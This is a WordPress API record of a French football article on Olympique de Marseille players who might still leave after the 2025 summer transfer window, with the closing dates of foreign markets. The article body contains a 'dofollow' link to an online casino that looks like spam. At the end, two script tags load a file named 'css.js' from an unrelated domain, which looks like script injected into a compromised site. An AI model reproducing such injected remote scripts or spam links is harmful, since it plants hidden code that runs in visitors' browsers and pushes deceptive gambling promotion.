{"id":3527,"date":"2025-11-20T03:09:35","date_gmt":"2025-11-20T03:09:35","guid":{"rendered":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/?p=3527"},"modified":"2026-02-02T22:20:05","modified_gmt":"2026-02-02T22:20:05","slug":"mercato-om-encore-une-sortie-possible-pour-harit-maupay-lirola","status":"publish","type":"post","link":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/2025\/11\/20\/mercato-om-encore-une-sortie-possible-pour-harit-maupay-lirola\/","title":{"rendered":"Mercato OM &#8211; encore une sortie possible pour Harit, Maupay, Lirola&#8230;"},"content":{"rendered":"<h1>Mercato OM &#8211; encore une sortie possible pour Harit, Maupay, Lirola&#8230;<\/h1>\n<p>Le mercato d\u2019\u00e9t\u00e9 2025 a baiss\u00e9 le rideau ce lundi 1er septembre \u00e0 20h dans les cinq grands championnats europ\u00e9ens, dont la Ligue 1. La fermeture a eu lieu plus t\u00f4t que les saisons pr\u00e9c\u00e9dentes, o\u00f9 elle s\u2019\u00e9tendait souvent jusqu\u2019\u00e0 23h ou minuit. Les clubs fran\u00e7ais n\u2019ont d\u00e9sormais plus la possibilit\u00e9 de recruter, sauf via deux exceptions pr\u00e9vues par le r\u00e8glement : la signature d\u2019un joueur libre et l\u2019utilisation d\u2019un joker. Une option rarement utilis\u00e9e ces derni\u00e8res saisons, mais qui avait permis \u00e0 l\u2019OM de faire venir <strong>Valentin Rongier<\/strong> en 2019 au 1er septembre car les deux clubs ne s&#x27;\u00e9taient pas entendus avant.<\/p>\n<blockquote><p><strong><a href=\"https:\/\/amunra-casino-fr.com\/contato\/\" target=\"_blank\" rel=\"dofollow\">Support client de Casino Vert \u2764\ufe0f : un service disponible 24h\/24<\/a><\/strong> &#8211; Vous \u00eates-vous d\u00e9j\u00e0 demand\u00e9 \u00e0 quel point le service client peut influencer votre exp\u00e9rience sur un casino en ligne\u202f? Que faire si un d\u00e9p\u00f4t ne passe pas ou si<\/p><\/blockquote>\n<h2>Des portes de sortie encore possibles \u00e0 l\u2019\u00e9tranger<\/h2>\n<p>Si la Ligue 1 est d\u00e9sormais verrouill\u00e9e, certains championnats prolongent encore leur march\u00e9 estival. C\u2019est le cas en Europe avec les Pays-Bas, la Belgique, la Suisse, la Turquie, la Gr\u00e8ce ou encore la Russie, dont les fen\u00eatres se refermeront dans les prochains jours. Hors du Vieux Continent, l\u2019Arabie saoudite, le Qatar, le Mexique ou encore le Br\u00e9sil laissent \u00e9galement du temps pour conclure des affaires. Ces championnats sont r\u00e9guli\u00e8rement venus piocher en Ligue 1 ces derni\u00e8res ann\u00e9es, ce qui en fait des destinations possibles pour les joueurs marseillais en instance de d\u00e9part.<\/p>\n<h2>L\u2019OM attentif pour ses joueurs en partance<\/h2>\n<p>Du c\u00f4t\u00e9 de la direction olympienne, ces prolongations offrent des opportunit\u00e9s de r\u00e9gler certains dossiers encore en suspens. Des \u00e9l\u00e9ments comme <strong>Pol Lirola<\/strong>, <strong>Amine Harit<\/strong> ou <strong>Neal Maupay<\/strong> n\u2019entrent plus dans les plans et pourraient encore trouver une issue dans ces march\u00e9s actifs. La Turquie, l\u2019Arabie saoudite et le Qatar apparaissent comme les destinations les plus probables, car elles ont l\u2019habitude d\u2019accueillir des joueurs venus de Ligue 1. L\u2019OM garde donc un \u0153il attentif sur ces championnats afin de boucler quelques d\u00e9parts tardifs.<\/p>\n<h2>Les prochaines dates \u00e0 retenir<\/h2>\n<p>Plusieurs championnats restent donc ouverts en ce d\u00e9but septembre. Aux Pays-Bas, le march\u00e9 se refermera d\u00e8s le 2 septembre, tandis que le Br\u00e9sil fermera ses portes le 3. L\u2019Autriche suivra le 5, avant la Belgique le 8 et la Suisse le 9. En Arabie saoudite, les clubs auront jusqu\u2019au 11 septembre pour recruter. Gr\u00e8ce, Turquie et Russie cl\u00f4tureront simultan\u00e9ment le 12, tandis que le Mexique attendra le 13. Enfin, le Qatar sera le dernier \u00e0 boucler son mercato, le 16 septembre. Pass\u00e9es ces dates, seuls les joueurs libres pourront encore renforcer une \u00e9quipe. C&#x27;est pourquoi certains ont r\u00e9sili\u00e9 ce lundi, pour garder une chance de rejoindre une autre \u00e9curie via cette possibilit\u00e9.<\/p>\n<p><button class=\"button_button__AbnlE button_md__HB_Xg button_blue__rWPTN\">Retrouvez le tableau des transferts de l&#x27;OM ici<\/button><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Mercato OM &#8211; encore une sortie possible pour Harit, Maupay, Lirola&#8230; Le mercato d\u2019\u00e9t\u00e9 2025 a baiss\u00e9 le rideau ce lundi 1er septembre \u00e0 20h dans les cinq grands championnats&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[19],"tags":[],"class_list":{"0":"post-3527","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-cassino"},"_links":{"self":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3527","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/comments?post=3527"}],"version-history":[{"count":3,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3527\/revisions"}],"predecessor-version":[{"id":15137,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3527\/revisions\/15137"}],"wp:attachment":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/media?parent=3527"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/categories?post=3527"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/tags?post=3527"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}